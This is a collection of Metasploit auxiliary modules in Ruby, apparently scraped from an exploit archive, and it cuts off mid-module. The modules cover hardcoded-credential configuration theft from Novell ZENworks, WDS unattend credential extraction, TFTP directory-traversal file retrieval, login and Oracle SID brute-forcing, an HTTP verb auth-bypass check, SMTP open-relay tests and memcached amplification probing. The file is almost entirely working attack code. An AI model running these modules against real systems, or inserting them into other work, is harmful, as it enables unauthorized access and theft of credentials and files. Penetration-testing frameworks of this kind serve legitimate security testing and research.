This Metasploit module exploits a hardcoded user and password for the GetConfig maintenance task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve the configuration parameters of Novell Zenworks Asset Management, including the database credentials in clear text. This Metasploit module has been successfully tested on Novell ZENworks Asset Management 7.5.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'Novell ZENworks Asset Management 7.5 Configuration Access',      'Description'    => %q{          This module exploits a hardcoded user and password for the GetConfig maintenance        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web        Console and can be triggered by sending a specially crafted request to the rtrlet component,        allowing a remote unauthenticated user to retrieve the configuration parameters of        Novell Zenworks Asset Management, including the database credentials in clear text.        This module has been successfully tested on Novell ZENworks Asset Management 7.5.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'juan vazquez' # Also the discoverer        ],      'References'     =>        [          [ 'CVE', '2012-4933' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2012/10/11/cve-2012-4933-novell-zenworks/' ]        ]    ))    register_options(      [        Opt::RPORT(8080),      ])  end  def run_host(ip)    post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"    print_status("#{rhost}:#{rport} - Sending request...")    res = send_request_cgi({      'uri'          => '/rtrlet/rtr',      'method'       => 'POST',      'data'         => post_data,    }, 5)    if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters $live$<\/b><br\/>/      print_good("#{rhost}:#{rport} - File retrieved successfully!")      path = store_loot(        'novell.zenworks_asset_management.config',        'text/html',        ip,        res.body,        nil,        "Novell ZENworks Asset Management Configuration"      )      print_status("#{rhost}:#{rport} - File saved in: #{path}")    else      print_error("#{rhost}:#{rport} - Failed to retrieve configuration")      return    end  endend

Novell ZENworks Asset Management 7.5 Configuration Access

This Metasploit module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::EPMP  def initialize(info = {})    super(update_info(info,      'Name' => 'Cambium ePMP 1000 Login Scanner',      'Description' => %{        This module scans for Cambium ePMP 1000 management login portal(s), and        attempts to identify valid credentials. Default login credentials are -        admin/admin, installer/installer, home/home and readonly/readonly.      },      'Author' =>        [          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'        ],      'References' =>        [          ['URL', 'http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/']        ],      'License'        => MSF_LICENSE     )    )    register_options(      [        Opt::RPORT(80),  # Application may run on a different port too. Change port accordingly.        OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),        OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'admin'])      ], self.class    )  end  def run_host(ip)    unless is_app_epmp1000?      return    end  end  #  # Brute-force the login page  #  def do_login(epmp_ver)    if epmp_ver < '3.4.1' # <3.4.1 uses login_1      each_user_pass do |user, pass|        login_1(user, pass, epmp_ver)      end    else      each_user_pass do |user, pass|        login_2(user, pass, epmp_ver)      end    end  endend

Cambium EPMP 1000 Login Scanner

This Metasploit module test for authentication bypass using different HTTP verbs.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  # Exploit mixins should be called first  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::WmapScanDir  include Msf::Auxiliary::WmapScanFile  # Scanner mixin should be near last  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'          => 'HTTP Verb Authentication Bypass Scanner',      'Description'   => %q{        This module test for authentication bypass using different HTTP verbs.      },      'Author'        => ['et [at] metasploit.com'],      'License'       => BSD_LICENSE))    register_options(      [        OptString.new('TARGETURI', [true,  "The path to test", '/'])      ])  end  def run_host(ip)    begin      test_verbs(ip)    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  end  def test_verbs(ip)    verbs = [ 'HEAD', 'TRACE', 'TRACK', 'Wmap', 'get', 'trace' ]    res = send_request_raw({      'uri'          => normalize_uri(target_uri.path),      'method'       => 'GET'    }, 10)    return if not res    if not res.headers['WWW-Authenticate']      print_status("#{full_uri} - Authentication not required [#{res.code}]")      return    end    auth_code = res.code    print_status("#{full_uri} - Authentication required: #{res.headers['WWW-Authenticate']} [#{auth_code}]")    report_note(      :host   => ip,      :proto  => 'tcp',      :sname  => (ssl ? 'https' : 'http'),      :port   => rport,      :type   => 'WWW_AUTHENTICATE',      :data   => "#{target_uri.path} Realm: #{res.headers['WWW-Authenticate']}",      :update => :unique_data    )    verbs.each do |tv|      resauth = send_request_raw({        'uri'          => normalize_uri(target_uri.path),        'method'       => tv      }, 10)      next if not resauth      print_status("#{full_uri} - Testing verb #{tv} [#{resauth.code}]")      if resauth.code != auth_code and resauth.code <= 302        print_good("#{full_uri} - Possible authentication bypass with verb #{tv} [#{resauth.code}]")        # Unable to use report_web_vuln as method is not in list of allowed methods.        report_note(          :host   => ip,          :proto  => 'tcp',          :sname  => (ssl ? 'https' : 'http'),          :port   => rport,          :type   => 'AUTH_BYPASS_VERB',          :data   => "#{target_uri.path} Verb: #{tv}",          :update => :unique_data        )      end    end  endend

HTTP Verb Authentication Bypass Scanner

This Metasploit module tests if an SMTP server will accept (via a code 250) an e-mail by using a variation of testing methods. Some of the extended methods will try to abuse configuration or mailserver flaws.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Smtp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'SMTP Open Relay Detection',      'Description' => %q{        This module tests if an SMTP server will accept (via a code 250)        an e-mail by using a variation of testing methods.        Some of the extended methods will try to abuse configuration or mailserver flaws.      },      'References'  =>        [          ['URL', 'http://www.ietf.org/rfc/rfc2821.txt'],          ['URL', 'https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse'],        ],      'Author'      =>        [          'Campbell Murray',          'xistence <xistence[at]0x90.nl>',        ],      'License'     => MSF_LICENSE    )    register_options(      [        OptBool.new('EXTENDED', [true, 'Do all the 16 extended checks', false]),      ])  end  def run_host(ip)    begin      connect      banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)      print_good("SMTP #{banner_sanitized}")      report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner)      if datastore['EXTENDED']        if banner_sanitized =~ /220 (.*) /          serverhost = $1        end        mailfromuser = datastore['MAILFROM'].split("@").first        mailfromdomain = datastore['MAILFROM'].split("@").last        mailtouser = datastore['MAILTO'].split("@").first        mailtodomain = datastore['MAILTO'].split("@").last        do_test_relay(1, "MAIL FROM:<>", "RCPT TO:<#{datastore['MAILTO']}>")        do_test_relay(2, "MAIL FROM:<#{datastore['MAILFROM']}>", "RCPT TO:<#{datastore['MAILTO']}>")        do_test_relay(3, "MAIL FROM:<#{mailfromuser}@#{serverhost}>", "RCPT TO:<#{datastore['MAILTO']}>")        do_test_relay(4, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtouser}@[#{rhost}]>")        do_test_relay(5, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtouser}\%#{mailtodomain}@[#{rhost}]>")        do_test_relay(6, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtouser}\%#{mailtodomain}@#{serverhost}>")        do_test_relay(7, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<\"#{mailtouser}@#{mailtodomain}\">")        do_test_relay(8, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<\"#{mailtouser}\%#{mailtodomain}\">")        do_test_relay(9, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtouser}@#{mailtodomain}@[#{rhost}]>")        do_test_relay(10, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<\"#{mailtouser}@#{mailtodomain}\"@[#{rhost}]>")        do_test_relay(11, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtouser}@#{mailtodomain}@#{serverhost}>")        do_test_relay(12, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<@[#{rhost}]:#{mailtouser}@#{mailtodomain}>")        do_test_relay(13, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<@#{serverhost}:#{mailtouser}@#{mailtodomain}>")        do_test_relay(14, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtodomain}!#{mailtouser}>")        do_test_relay(15, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtodomain}!#{mailtouser}@[#{rhost}]>")        do_test_relay(16, "MAIL FROM:<#{mailfromuser}@[#{rhost}]>", "RCPT TO:<#{mailtodomain}!#{mailtouser}@#{serverhost}>")      else        do_test_relay(nil, "MAIL FROM:<#{datastore['MAILFROM']}>", "RCPT TO:<#{datastore['MAILTO']}>")    end    rescue      print_error("Unable to establish an SMTP session")      return    end  end  def do_test_relay(testnumber, mailfrom, mailto)    begin      connect      res = raw_send_recv("EHLO X\r\n")      vprint_status("#{res.inspect}")      # check if the EHLO is actually supported. In case it's not, try the HELO command instead      if res.to_s =~ /^5\d\d/        res = raw_send_recv("HELO X\r\n")        vprint_status("#{res.inspect}")      end      res = raw_send_recv("#{mailfrom}\r\n")      vprint_status("#{res.inspect}")      res = raw_send_recv("#{mailto}\r\n")      vprint_status("#{res.inspect}")      res = raw_send_recv("DATA\r\n")      vprint_status("#{res.inspect}")      res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n")      vprint_status("#{res.inspect}")      if res =~ /250/        if testnumber.nil?          print_good("Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}")        else          print_good("Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}")        end      else        if testnumber.nil?          print_status "No relay detected"        else          print_status "Test ##{testnumber} - No relay detected"        end      end    rescue      print_error("Test ##{testnumber} - Unable to establish an SMTP session")      return    end  endend

SMTP Open Relay Detection

This Metasploit module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::DCERPC  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  DCERPCPacket     = Rex::Proto::DCERPC::Packet  DCERPCClient     = Rex::Proto::DCERPC::Client  DCERPCResponse   = Rex::Proto::DCERPC::Response  DCERPCUUID       = Rex::Proto::DCERPC::UUID  WDS_CONST       = Rex::Proto::DCERPC::WDSCP::Constants  def initialize(info = {})    super(update_info(info,      'Name'           => 'Microsoft Windows Deployment Services Unattend Retrieval',      'Description'    => %q{        This module retrieves the client unattend file from Windows        Deployment Services RPC service and parses out the stored credentials.        Tested against Windows 2008 R2 x64 and Windows 2003 x86.      },      'Author'         => [ 'Ben Campbell' ],      'License'        => MSF_LICENSE,      'References'     =>        [          [ 'URL', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'],          [ 'URL', 'http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html']        ],      ))    register_options(      [        Opt::RPORT(5040),      ])    deregister_options('CHOST', 'CPORT', 'SSL', 'SSLVersion')    register_advanced_options(      [        OptBool.new('ENUM_ARM', [true, 'Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)', false])      ])  end  def run_host(ip)    begin      query_host(ip)    rescue ::Interrupt      raise $!    rescue ::Rex::ConnectionError => e      print_error("#{ip}:#{rport} Connection Error: #{e}")    ensure      # Ensure socket is pulled down afterwards      self.dcerpc.socket.close rescue nil      self.dcerpc = nil      self.handle = nil    end  end  def query_host(rhost)    # Create a handler with our UUID and Transfer Syntax    self.handle = Rex::Proto::DCERPC::Handle.new(      [        WDS_CONST::WDSCP_RPC_UUID,        '1.0',      ],      'ncacn_ip_tcp',      rhost,      [datastore['RPORT']]    )    print_status("Binding to #{handle} ...")    self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock)    vprint_good("Bound to #{handle}")    report_service(      :host => rhost,      :port => datastore['RPORT'],      :proto => 'tcp',      :name => "dcerpc",      :info => "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services"    )    table = Rex::Text::Table.new({      'Header' => 'Windows Deployment Services',      'Indent' => 1,      'Columns' => ['Architecture', 'Type', 'Domain', 'Username', 'Password']    })    creds_found = false    WDS_CONST::ARCHITECTURE.each do |architecture|      if architecture[0] == :ARM && !datastore['ENUM_ARM']        vprint_status "Skipping #{architecture[0]} architecture due to adv option"        next      end      begin        result = request_client_unattend(architecture)      rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e        vprint_error(e.to_s)        print_error("#{rhost} DCERPC Fault - Windows Deployment Services is present but not configured. Perhaps an SCCM installation.")        return nil      end      unless result.nil?        loot_unattend(architecture[0], result)        results = parse_client_unattend(result)        results.each do |result|          unless result.empty?            if result['username'] and result['password']              print_good("Retrieved #{result['type']} credentials for #{architecture[0]}")              creds_found = true              domain = ""              domain = result['domain'] if result['domain']              report_creds(domain, result['username'], result['password'])              table << [architecture[0], result['type'], domain, result['username'], result['password']]            end          end        end      end    end    if creds_found      print_line      table.print      print_line    else      print_error("No Unattend files received, service is unlikely to be configured for completely unattended installation.")    end  end  def request_client_unattend(architecture)    # Construct WDS Control Protocol Message    packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND)    guid = Rex::Text.rand_text_hex(32)    packet.add_var(  WDS_CONST::VAR_NAME_CLIENT_GUID, guid)    # Not sure what this padding is for...    mac = [0x30].pack('C') * 20    mac << Rex::Text.rand_text_hex(12)    packet.add_var(  WDS_CONST::VAR_NAME_CLIENT_MAC, mac)    arch = [architecture[1]].pack('C')    packet.add_var(  WDS_CONST::VAR_NAME_ARCHITECTURE, arch)    version = [1].pack('V')    packet.add_var(  WDS_CONST::VAR_NAME_VERSION, version)    wdsc_packet = packet.create    vprint_status("Sending #{architecture[0]} Client Unattend request ...")    dcerpc.call(0, wdsc_packet, false)    timeout = datastore['DCERPC::ReadTimeout']    response = Rex::Proto::DCERPC::Client.read_response(self.dcerpc.socket, timeout)    if (response and response.stub_data)      vprint_status('Received response ...')      data = response.stub_data      # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000      op_error_code = data.unpack('v*')[19]      if op_error_code == 0        if data.length < 277          vprint_error("No Unattend received for #{architecture[0]} architecture")          return nil        else          vprint_status("Received #{architecture[0]} unattend file ...")          return extract_unattend(data)        end      else        vprint_error("Error code received for #{architecture[0]}: #{op_error_code}")        return nil      end    end  end  def extract_unattend(data)    start = data.index('<?xml')    finish = data.index('</unattend>')    if start and finish      finish += 10      return data[start..finish]    else      print_error("Incomplete transmission or malformed unattend file.")      return nil    end  end  def parse_client_unattend(data)    begin      xml = REXML::Document.new(data)      return Rex::Parser::Unattend.parse(xml).flatten    rescue REXML::ParseException => e      print_error("Invalid XML format")      vprint_line(e.message)      return nil     end  end  def loot_unattend(archi, data)    return if data.empty?    p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, archi, "Windows Deployment Services")    print_good("Raw version of #{archi} saved as: #{p}")  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def report_creds(domain, user, pass)    report_cred(      ip: rhost,      port: 4050,      service_name: 'dcerpc',      user: "#{domain}\\#{user}",      password: pass,      proof: domain    )  endend

Microsoft Windows Deployment Services Unattend Retrieval

This Metasploit module can be used to discover Memcached servers which expose the unrestricted UDP port 11211. A basic "stats" request is executed to check if an amplification attack is possible against a third party.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Capture  include Msf::Auxiliary::UDPScanner  include Msf::Auxiliary::DRDoS  def initialize    super(      'Name'        => 'Memcached Stats Amplification Scanner',      'Description' => %q(          This module can be used to discover Memcached servers which expose the          unrestricted UDP port 11211. A basic "stats" request is executed to check          if an amplification attack is possible against a third party.      ),      'Author'      =>        [          'Marek Majkowski', # Cloudflare blog and base payload          'xistence <xistence[at]0x90.nl>', # Metasploit scanner module          'Jon Hart <jon_hart@rapid7.com>', # Metasploit scanner module        ],      'License'     => MSF_LICENSE,      'DisclosureDate' => 'Feb 27 2018',      'References'  =>          [            ['URL', 'https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/'],            ['CVE', '2018-1000115']          ]    )    register_options([      Opt::RPORT(11211)    ])  end  def build_probe    # Memcached stats probe, per https://github.com/memcached/memcached/blob/master/doc/protocol.txt    @memcached_probe ||= [      rand(2**16), # random request ID      0, # sequence number      1, # number of datagrams in this sequence      0, # reserved; must be 0      "stats\r\n"    ].pack("nnnna*")  end  def scanner_process(data, shost, sport)    # Check the response data for a "STAT" response    if data =~ /\x0d\x0aSTAT\x20/      @results[shost] ||= []      @results[shost] << data    end  end  # Called after the scan block  def scanner_postscan(batch)    @results.keys.each do |host|      response_map = { @memcached_probe => @results[host] }      report_service(        host: host,        proto: 'udp',        port: rport,        name: 'memcached'      )      peer = "#{host}:#{rport}"      vulnerable, proof = prove_amplification(response_map)      what = 'memcached stats amplification'      if vulnerable        print_good("#{peer} - Vulnerable to #{what}: #{proof}")        report_vuln(          host: host,          port: rport,          proto: 'udp',          name: what,          refs: references        )      else        vprint_status("#{peer} - Not vulnerable to #{what}: #{proof}")      end    end  endend

Memcached Stats Amplification Scanner

This Metasploit module uses a dictionary to brute force valid TFTP image names from a TFTP server.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'TFTP Brute Forcer',      'Description' => 'This module uses a dictionary to brute force valid TFTP image names from a TFTP server.',      'Author'      => 'antoine',      'License'     => BSD_LICENSE    )    register_options(      [        Opt::RPORT(69),        Opt::CHOST,        OptPath.new('DICTIONARY', [ true, 'The list of filenames',          File.join(Msf::Config.data_directory, "wordlists", "tftp.txt") ])      ])  end  def run_host(ip)    begin      # Create an unbound UDP socket if no CHOST is specified, otherwise      # create a UDP socket bound to CHOST (in order to avail of pivoting)      udp_sock = Rex::Socket::Udp.create(        {          'LocalHost' => datastore['CHOST'] || nil,          'Context'   =>            {              'Msf'        => framework,              'MsfExploit' => self,            }        }      )      add_socket(udp_sock)      fd = File.open(datastore['DICTIONARY'], 'rb')      fd.read(fd.stat.size).split("\n").each do |filename|        filename.strip!        pkt = "\x00\x01" + filename + "\x00" + "netascii" + "\x00"        udp_sock.sendto(pkt, ip, datastore['RPORT'])        resp = udp_sock.get(3)        if resp and resp.length >= 2 and resp[0, 2] == "\x00\x03"          print_good("Found #{filename} on #{ip}")          #Add Report          report_note(            :host  => ip,            :proto => 'udp',            :sname  => 'tftp',            :port  => datastore['RPORT'],            :type  => "Found #{filename}",            :data  => "Found #{filename}"          )        end      end      fd.close    rescue    ensure      udp_sock.close    end  endend

TFTP Brute Forcer

This Metasploit modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Golds TFTP service.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'           => "IpSwitch WhatsUp Gold TFTP Directory Traversal",      'Description'    => %q{          This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp        Gold's TFTP service.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Prabhu S Angadi',  # Initial discovery and poc          'sinn3r',           # Metasploit module          'juan vazquez'      # More improvements        ],      'References'     =>        [          ['OSVDB', '77455'],          ['BID', '50890'],          ['EDB', '18189'],          ['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt'],          ['CVE', '2011-4722']        ],      'DisclosureDate' => '2011-12-12'    ))    register_options(      [        Opt::RPORT(69),        OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),        OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false])      ])  end  def run_host(ip)    # Prepare the filename    file_name  = "../"*10    file_name << datastore['FILENAME']    # Prepare the packet    pkt = "\x00\x01"    pkt << file_name    pkt << "\x00"    pkt << "octet"    pkt << "\x00"    # We need to reuse the same port in order to receive the data    udp_sock = Rex::Socket::Udp.create(      {        'Context' => {'Msf' => framework, 'MsfExploit'=>self}      }    )    add_socket(udp_sock)    # Send the packet to target    file_data = ''    udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)    while (r = udp_sock.recvfrom(65535, 0.1) and r[1])      opcode, block, data = r[0].unpack("nna*") # Parse reply      if opcode != 3 # Check opcode: 3 => Data Packet        print_error("Error retrieving file #{file_name} from #{ip}")        return      end      file_data << data      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack    end    if file_data.empty?        print_error("Error retrieving file #{file_name} from #{ip}")        return    end    udp_sock.close    # Output file if verbose    vprint_line(file_data.to_s)    # Save file to disk    path = store_loot(      'whatsupgold.tftp',      'application/octet-stream',      ip,      file_data,      datastore['FILENAME']    )    print_status("File saved in: #{path}")  end  #  # Returns an Acknowledgement  #  def tftp_ack(block=1)    pkt = "\x00\x04" # Ack    pkt << [block].pack("n") # Block Id  endend=beginRemote code execution might be unlikely with this directory traversal bug, because WRITErequests are forbidden by default, and cannot be changed.=end

IpSwitch WhatsUp Gold TFTP Directory Traversal

This Metasploit modules exploits a directory traversal vulnerability in NetDecision 4.2 TFTP service.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'           => "NetDecision 4.2 TFTP Directory Traversal",      'Description'    => %q{          This modules exploits a directory traversal vulnerability in NetDecision 4.2        TFTP service.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Rob Kraus', # Vulnerability discovery          'juan vazquez' # Metasploit module        ],      'References'     =>        [          ['CVE', '2009-1730'],          ['OSVDB', '54607'],          ['BID', '35002']        ],      'DisclosureDate' => '2009-05-16'    ))    register_options(      [        Opt::RPORT(69),        OptInt.new('DEPTH', [false, "Levels to reach base directory",1]),        OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),      ])  end  def run_host(ip)    # Configure how deep we want to traverse    depth  = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']    # Prepare the filename    file_name = "../" * depth    file_name << datastore['FILENAME']    # Prepare the packet    pkt = "\x00\x01"    pkt << file_name    pkt << "\x00"    pkt << "octet"    pkt << "\x00"    # We need to reuse the same port in order to receive the data    udp_sock = Rex::Socket::Udp.create(      {        'Context' => {'Msf' => framework, 'MsfExploit'=>self}      }    )    add_socket(udp_sock)    # Send the packet to target    file_data = ''    udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)    while (r = udp_sock.recvfrom(65535, 0.1) and r[1])      opcode, block, data = r[0].unpack("nna*") # Parse reply      if opcode != 3 # Check opcode: 3 => Data Packet        print_error("Error retrieving file #{file_name} from #{ip}")        return      end      file_data << data      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack    end    if file_data.empty?        print_error("Error retrieving file #{file_name} from #{ip}")        return    end    udp_sock.close    # Output file if verbose    vprint_line(file_data.to_s)    # Save file to disk    path = store_loot(      'netdecision.tftp',      'application/octet-stream',      ip,      file_data,      datastore['FILENAME']    )    print_status("File saved in: #{path}")  end  #  # Returns an Acknowledgement  #  def tftp_ack(block=1)    pkt = "\x00\x04" # Ack    pkt << [block].pack("n") # Block Id  endend

NetDecision 4.2 TFTP Directory Traversal

This Metasploit module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigans default oracle password list.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Oracle XML DB SID Discovery via Brute Force',      'Description' => %q{          This module attempts to retrieve the sid from the Oracle XML DB httpd server,          utilizing Pete Finnigan's default oracle password list.      },      'References'  =>        [          [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ],          [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'],        ],      'Author'      => [ 'nebulus' ],      'License'     => MSF_LICENSE    )    register_options(        [          OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),          Opt::RPORT(8080),        ])  end  def run_host(ip)    begin    res = send_request_raw({      'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',      'version' => '1.0',      'method'  => 'GET'    }, 5)    return if not res    if(res.code == 200)      vprint_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code}) is not password protected.")      return    elsif(res.code == 403 || res.code == 401)      print_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code})")    end    list = datastore['CSVFILE']    users = []    fd = CSV.foreach(list) do |brute|      dbuser = brute[2].downcase      dbpass = brute[3].downcase      user_pass = "#{dbuser}:#{dbpass}"      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',        'version' => '1.0',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, 10)      if( not res )        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")        next      end      if (res.code == 200)        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0]        report_note(          :host => ip,          :proto  => 'tcp',          :port => datastore['RPORT'],          :type => 'SERVICE_NAME',          :data => sid,          :update => :unique_data        )        print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}")        users.push(user_pass)      else        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")      end    end #fd.each    good = false    users.each do |user_pass|      (u,p) = user_pass.split(':')      # get versions      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/PRODUCT_COMPONENT_VERSION',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          print_good("Version Information ==> as #{u}")          doc.elements.each('PRODUCT_COMPONENT_VERSION/ROW') do |e|            p = e.elements['PRODUCT'].get_text            v = e.elements['VERSION'].get_text            s = e.elements['STATUS'].get_text            report_note(              :host => datastore['RHOST'],              :sname => 'xdb',              :proto => 'tcp',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{p}#{v}",              :update => :unique_data            )            print_good("\t#{p}\t\t#{v}\t(#{s})")          end        end      end      # More version information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_REGISTRY_BANNERS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          doc.elements.each('ALL_REGISTRY_BANNERS/ROW') do |e|            next if e.elements['BANNER'] == nil            b = e.elements['BANNER'].get_text            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{b}",              :update => :unique_data            )            print_good("\t#{b}")          end        end      end      # database links      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_DB_LINKS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug 